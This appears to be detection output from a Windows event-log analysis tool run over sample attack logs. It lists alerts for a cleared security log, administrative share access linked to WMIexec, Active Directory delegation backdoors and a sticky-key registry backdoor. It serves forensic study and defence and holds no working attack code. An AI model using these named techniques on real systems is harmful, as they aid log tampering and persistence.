+2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 47020  :  LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 34114  :  LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 57116  :  LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 57116  :  LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 57116  :  LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
